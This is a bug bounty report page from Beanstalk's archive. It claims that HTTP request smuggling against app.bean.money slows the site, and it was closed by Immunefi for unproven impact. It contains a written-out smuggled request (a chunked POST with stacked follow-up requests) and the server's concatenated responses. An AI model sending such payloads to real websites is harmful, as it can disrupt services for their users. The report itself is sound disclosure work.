Beanstalk Notion
Beanstalk Notion
/
🪲
Bug Reports
/
BIC Notes
/
📄
Report #32082
📄

Report #32082

Report Date
June 7, 2024
Status
Closed
Payout

HTTP Request Smuggling Leads to Taking Down the application/website

‣
Report Info

Report ID

#32082

Report type

Websites and Applications

Has PoC?

Yes

PoC Link

https://gist.github.com/imhego/36857861fe7bed0b67683c6f667babc6

Target

https://app.bean.money

Impacts

Taking down the application/website requiring manual restoration

Description

HTTP request smuggling is a technique for interfering with the way a web site processes sequences of HTTP requests that are received from one or more users. Request smuggling vulnerabilities are often critical in nature, allowing an attacker to bypass security controls, gain unauthorized access to sensitive data, and directly compromise other application users.

Vulnerability Details

Offer a detailed explanation of the vulnerability itself. Do not leave out any relevant information. Code snippets should be supplied whenever helpful, as long as they don’t overcrowd the report with unnecessary details. This section should make it obvious that you understand exactly what you’re talking about, and more importantly, it should be clear by this point that the vulnerability does exist.

Smuggled Request Sample

POST / HTTP/1.1
Host: app.bean.money
Accept: */*
Connection: keep-alive
Transfer-Encoding: chunked

0

POST / HTTP/1.1
Host: app.bean.money


POST / HTTP/1.1
Host: app.bean.money


POST / HTTP/1.1
Host: app.bean.money


POST / HTTP/1.1
Host: app.bean.money

Impact Details

Normally, the processing time for each user's request is approximately 120 milliseconds. However, after injecting the smuggled requests, the server is forced to respond to all the requests as a single request. This significantly increases the load on the server, causing the processing time to spike to 3000 milliseconds. (Additionally, it is possible to retest to apply more pressure on the web server and induce further delay.)

Proof of concept

HTTP/1.1 308 Permanent Redirect Content-Type: text/plain; charset=utf-8 Date: Fri, 07 Jun 2024 16:55:08 GMT Location: https://app.bean.money/ Server: Netlify X-Nf-Request-Id: 01HZST07SV3097JB2P01BK44EY Content-Length: 38 Redirecting to https://app.bean.money/HTTP/1.1 308 Permanent Redirect Content-Type: text/plain; charset=utf-8 Date: Fri, 07 Jun 2024 16:55:08 GMT Location: https://app.bean.money/ Server: Netlify X-Nf-Request-Id: 01HZST07SVK0SHJBWKZK5V96JV Content-Length: 38 Redirecting to https://app.bean.money/HTTP/1.1 308 Permanent Redirect Content-Type: text/plain; charset=utf-8 Date: Fri, 07 Jun 2024 16:55:08 GMT Location: https://app.bean.money/ Server: Netlify X-Nf-Request-Id: 01HZST07SWF25MQ9TYRXSM0WDT Content-Length: 38 Redirecting to https://app.bean.money/HTTP/1.1 308 Permanent Redirect Content-Type: text/plain; charset=utf-8 Date: Fri, 07 Jun 2024 16:55:08 GMT Location: https://app.bean.money/ Server: Netlify X-Nf-Request-Id: 01HZST07SW3DN91YW1ASM2XT23 Content-Length: 38 Redirecting to https://app.bean.money/ ...

Immunefi Response

Unfortunately, after reviewing your report, Immunefi has decided to close it due to the assessed impact being out of scope.

Immunefi review:

  • The claimed impact by the whitehat is in scope of the bug bounty program but the assessed impact doesn't match with the claimed impact for the following reasons.
    • Whitehat has not provided enough information on how HTTP Request Smuggling can cause the disruption of the entire application for regular users.
  • The assessed asset IS in scope for the bug bounty program

Please note that the project will receive a report of the closed submission and may choose to re-open it, but they are not obligated to do so.